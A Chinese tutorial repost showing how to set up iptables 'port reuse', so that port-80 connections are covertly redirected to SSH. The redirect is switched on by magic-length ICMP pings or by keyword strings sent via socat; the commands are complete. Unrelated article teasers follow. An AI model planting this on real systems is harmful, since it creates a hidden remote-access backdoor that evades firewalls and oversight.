iptables端口复用_远程操控

news2024/12/30 4:29:47

目录

方式一:利用 ICMP 做遥控开关

一、创建端口复用链

二、创建端口复用规则

三、设置开启开关

四、设置关闭开关

五、将发现的数据包转到HTTP_SSH_PORT链上进行处理

六、开启复用

七、关闭复用

方式二:利用tcp数据包中的关键字做遥控开关

一、创建端口复用链

二、创建端口复用规则

三、设置开启开关

四、关闭开关

五、将发现的数据包转到HTTP_SSH_TO链上进行处理

六、开启复用

七、关闭复用


方式一:利用 ICMP 做遥控开关

缺点:如果目标在内网,有可能无法直接 ping 到它,原因可能存在对方使用防火墙将ping直接关闭

一、创建端口复用链

iptables -t nat -N HTTP_SSH_PORT

结果如下图

二、创建端口复用规则

目的:将流量转发至22号端口

iptables -t nat -A HTTP_SSH_PORT -p tcp REDIRECT --to-port 22

结果如下图

三、设置开启开关

目的:如果接受到一个长为1139的ICMP包,则将来源IP添加到为jack的列表中

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name jack --rsource -j ACCEPT

结果如下图

四、设置关闭开关

目的:如果收到一个长为1140的ICMP包,则将来源IP从jack列表中去掉

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name jack --remove -j ACCEPT

结果如下图

五、将发现的数据包转到HTTP_SSH_PORT链上进行处理

目的:如果发现SYN包的来源IP处于jack列表中,将直接转到HTTP_SSH_PORT链上进行处理,有效时间为3600秒

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name jack --rsource -j HTTP_SSH_PORT

结果如下图

 

六、开启复用

向目标发送一个长度为 1111 的 ICMP 数据包(加上包头28,总长度实际为1139)

ping -c 1 -s 1111 192.168.75.134 

结果如下图

此时使用80端口进行远程连接,实现了80端口在22端口的复用,且成功连接

 

七、关闭复用

向目标发送一个长度为 1112 的 ICMP 数据包(加上包头 28,总长度实际为 1140)

ping -c 1 -s 1112 192.168.75.134 

此时使用80端口,进行远程连接将无法连接成功 

 

方式二:利用tcp数据包中的关键字做遥控开关

优点:不怕目标在内网

一、创建端口复用链

iptables -t nat -N HTTP_SSH_TO

结果如下图

二、创建端口复用规则

iptables -t nat -A HTTP_SSH_TO -p tcp -j REDIRECT --to-port 22

结果如下图

三、设置开启开关

iptables -A INPUT -p tcp -m string --string ‘threathuntercoming’ --algo bm -m recent --set --name jack --rsource -j ACCEPT

结果如下图

四、关闭开关

iptables -A INPUT -p tcp -m string --string ‘threathunterleaving’ --algo bm -m recent --name jack --remove -j ACCEPT

结果如下图

五、将发现的数据包转到HTTP_SSH_TO链上进行处理

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name jack --rsource -j HTTP_SSH_TO

结果如下图

六、开启复用

echo threathuntercoming | socat - tcp:192.168.75.137:80

七、关闭复用

echo threathunterleaving | socat - tcp:192.168.75.137:80

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/194436.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Java】GET 和 POST 请求的区别

GET 和 POST 请求的区别 GET 和 POST请求是最常用的两种请求方法,写了几个Servlet项目,发现这两种请求用的实在是多,给我的感觉就是这两个请求仿佛只有一个名字不同而已。但是通过查询资料发现,里面大有文章。HTTP协议定义的方法…

从0开始学python -18

Python3 元组 Python 的元组与列表类似,不同之处在于元组的元素不能修改。 元组使用小括号 ( ),列表使用方括号 [ ]。 元组创建很简单,只需要在括号中添加元素,并使用逗号隔开即可。 实例(Python 3.0) >>> tup1 (Go…

研发能力加码!维视智造团队入选“科学家+工程师”队伍!

一、维视智造成功入选2023年度秦创原“科学家工程师”队伍近日,陕西省科学技术厅公布了2023年度秦创原“科学家工程师”队伍入选名单,维视智造旗下欣维视觉工程师团队联合西北工业大学马志强副教授团队,申报的“大口径光学元件形性误差检测方…

第9章 Idea集成gitee(码云)

第一节 码云简介 众所周知,GitHub服务器在国外,使用GitHub作为项目托管网站,如果网速不好的话,严重影响使用体验,甚至会出现登录不上的情况。针对这个情况,大家也可以使用国内的项目托管网站-码云。 码云…

golang 协程关闭——谁敢说没踩过坑

Go语言中,协程创建和启动非常简单,但是如何才能正确关闭协程呢,和开车一样,前进总是很容易,但是如何正确的把车停在指定的地方总是不容易的。生产实践中,go常常遇到未能正确关闭协程而影响程序运行的场景&a…

Unity - TextMeshPro

TextMeshPro TextMeshPro 是 Unity 的终极文本解决方案。它是 Unity 的 UI 文本和旧版文本网格的完美替代品。 TextMeshPro(也称为 TMP)功能强大且易于使用,它使用高级文本渲染技术以及一组自定义着色器;提供显着的视觉质量改进&…

C++分文件编写VS Code和CMakeLists使用详解

目录一、示例代码1.1 主函数main.cpp1.2 子函数源文件1.3 子函数头文件二、VS Code编译2.1 报错2.2解决方法三、CMakeLists编译Windows 10 Ubuntu 20.04 VS Code 一、示例代码 1.1 主函数main.cpp 要用双引号包含子函数的头文件&#xff0c;第二行 #include<iostream&g…

项目经理必备的5种项目管理工具,让你的项目迅速上手

做项目管理是一条漫漫长路&#xff0c;所有的本事&#xff0c;都是靠一个个项目&#xff0c;一点点积累而来的&#xff0c;并不存在“迅速上手”的方法。 一名普通项目经理的成长&#xff0c;都要经过一定时间的修炼&#xff0c;并且要灵活使用项目管理工具&#xff0c;这里给…

跑步的人如何选择耳机、最好的跑步蓝牙耳机排名清单

相信很多人和小编一样&#xff0c;在跑步健身的时候也喜欢听点音乐&#xff0c;特别是节奏感强的音乐能让运动更加有激情。但是如果佩戴传统的有线耳机容易扯到线&#xff0c;在现代化的今天&#xff0c;当然要选择蓝牙耳机。今天就为大家介绍一下跑步用什么蓝牙耳机好&#xf…

看完这篇文章,我再也不用担心线上出现CPU性能问题了(下)

目录平均负载CPU 使用率进程上下文切换补充总结在 《看完这篇文章&#xff0c;我再也不用担心线上出现CPU性能问题了&#xff08;上&#xff09;》中&#xff0c;咸鱼给大家介绍了 CPU 常见的性能指标&#xff0c;当生产环境出现 CPU 性能瓶颈的时候&#xff0c;优先观察这些指…

论文投稿指南——中文核心期刊推荐(食品工业 2)

【前言】 &#x1f680; 想发论文怎么办&#xff1f;手把手教你论文如何投稿&#xff01;那么&#xff0c;首先要搞懂投稿目标——论文期刊 &#x1f384; 在期刊论文的分布中&#xff0c;存在一种普遍现象&#xff1a;即对于某一特定的学科或专业来说&#xff0c;少数期刊所含…

写IB EE(Extended Essay)时最容易犯的五大错误

【第一大忌】用随意找来的文章做Sources&#xff01; 同学们都知道EE写作一定要做好citation&#xff0c;在文中、文末都要列出参考资料。但不是什么文章都”有资格“成为bibliography的一部分&#xff0c;选取质量高的sources是很重要的。那些百度上搜到的作者不详、自己都没有…

教你使用 Petalinux 定制 Linux

测试平台&#xff1a;黑金 Zynq7035 开发板 芯片型号&#xff1a;XC7Z035-2FFG676I 开发环境&#xff1a;Ubuntu 16.04 开发工具&#xff1a;Petalinux 2017.4 Step1 创建 Petalinux 工程 1.1 将 Vivado 工程目录下*.sdk文件夹中的*.hdf文件复制到新建的proj文件夹中 1.2 …

串级PID控制原理-2

按串级控制的基本原理&#xff0c;采用Simulink进行编程&#xff0c;在连续方式下进行仿真。在串级控制中&#xff0c;主调节器采用PI控制&#xff0c;取kp 50&#xff0c;k i5&#xff0c;副调节器采用Р控制&#xff0c;kp 200。外加干扰为正弦信号sin(50t)&#xff0c;通过切…

报表控件Stimulsoft技术答疑:如何在二维码中编码数据?

Stimulsoft Reports是一款报告编写器&#xff0c;主要用于在桌面和Web上从头开始创建任何复杂的报告。可以在大多数平台上轻松实现部署&#xff0c;如ASP.NET, WinForms, .NET Core, JavaScript, WPF, Angular, Blazor, PHP, Java等&#xff0c;在你的应用程序中嵌入报告设计器…

深度学习网络各种激活函数 Sigmoid、Tanh、ReLU、Leaky_ReLU、SiLU、Mish

激活函数的目的就是为网络提供非线性化 梯度消失&#xff1a;梯度为0&#xff0c; 无法反向传播&#xff0c;导致参数得不到更新 梯度饱和&#xff1a;随着数据的变化&#xff0c;梯度没有明显变化 梯度爆炸&#xff1a;梯度越来越大&#xff0c;无法收敛 梯度消失问题&#…

JavaWeb1-计算机是如何工作的?

目录 1.计算机的构成 1.1.计算机二进制 1.2.冯诺依曼体系结构 1.2.1.CPU&#xff08;加工厂&#xff09; 1.2.2.存储器&#xff08;仓库&#xff09; 1.2.3.输⼊设备&#xff08;原材料&#xff09; 1.2.4.输出设备&#xff08;产品&#xff09; PS&#xff1a;关于存…

Jmeter 并发业务场景如何控制接口只执行一次

今天在做并发测试&#xff0c;执行后会发现登录接口执行多次&#xff0c;实际只需执行一次就可以。 刚开始用了网上推荐的仅一次控制器&#xff0c;但是发现仅一次控制器对线程组无效。 其实只要对元件熟悉&#xff0c;这个问题很简单&#xff0c;只需要用吞吐量控制器&#xf…

CDH数仓项目(四) —— 集群性能测试/资源管理/清理CDH集群

0 说明 本文基于《CDH数仓项目(一) —— CDH安装部署搭建详细流程》《CDH数仓项目(二) —— 用户行为数仓和业务数仓搭建》和《CDH数仓项目(三) —— Kerberos安全认证和Sentry权限管理》章节&#xff0c;本篇介绍些常见的性能测试和资源管理功能&#xff0c;及最后提供详细的…

SpringMVC之五种类型参数传递

目录 一&#xff1a;普通参数 二&#xff1a;POJO数据类型 三&#xff1a;嵌套POJO类型参数 四&#xff1a;数组类型参数 五&#xff1a;集合类型参数 知识点1&#xff1a;RequestParam 前面我们已经能够使用GET或POST来发送请求和数据&#xff0c;所携带的数据都是比较简…